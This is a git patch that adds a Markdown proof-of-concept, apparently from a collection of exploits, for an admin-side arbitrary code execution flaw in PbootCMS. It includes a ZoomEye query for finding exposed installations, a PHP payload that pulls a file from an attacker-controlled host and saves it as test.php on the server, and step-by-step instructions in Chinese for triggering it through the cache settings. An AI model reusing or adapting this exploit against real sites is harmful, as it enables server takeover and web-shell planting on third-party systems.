From 229bd17310e48b44dc7085d6e85a75e6d88d8dd2 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 8 Jan 2024 19:30:18 +0800
Subject: [PATCH] =?UTF-8?q?Create=20PbootCMS=E5=85=A8=E7=89=88=E6=9C=AC?=
 =?UTF-8?q?=E5=90=8E=E5=8F=B0=E9=80=9A=E6=9D=80=E4=BB=BB=E6=84=8F=E4=BB=A3?=
 =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 PbootCMS全版本后台通杀任意代码执行漏洞.md | 29 +++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 PbootCMS全版本后台通杀任意代码执行漏洞.md

diff --git a/PbootCMS全版本后台通杀任意代码执行漏洞.md b/PbootCMS全版本后台通杀任意代码执行漏洞.md
new file mode 100644
index 0000000..7c0d765
--- /dev/null
+++ b/PbootCMS全版本后台通杀任意代码执行漏洞.md
@@ -0,0 +1,29 @@
+## PbootCMS全版本后台通杀任意代码执行漏洞
+
+## ZoomEye
+```
+app:"PbootCMS"
+```
+
+## poc
+```
+<?php
+
+$test="copy";
+
+$test("http://IP:8080/1.txt","test.php");
+
+?>
+```
+![image](https://github.com/wy876/POC/assets/139549762/59c806d4-0ad6-41fd-b63e-8fed7966261f)
+
+然后来到全局配置-配置参数
+
+打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存
+![image](https://github.com/wy876/POC/assets/139549762/4e5aeaab-c7c8-4fd2-af08-c16f922eb3ec)
+
+![image](https://github.com/wy876/POC/assets/139549762/e96a68d8-205e-4aee-8fd3-e9177a868f40)
+
+然后随便点击任意文章，触发漏洞
+
+![image](https://github.com/wy876/POC/assets/139549762/0e4b0c28-99b4-405c-9e37-be7d1d55bcc9)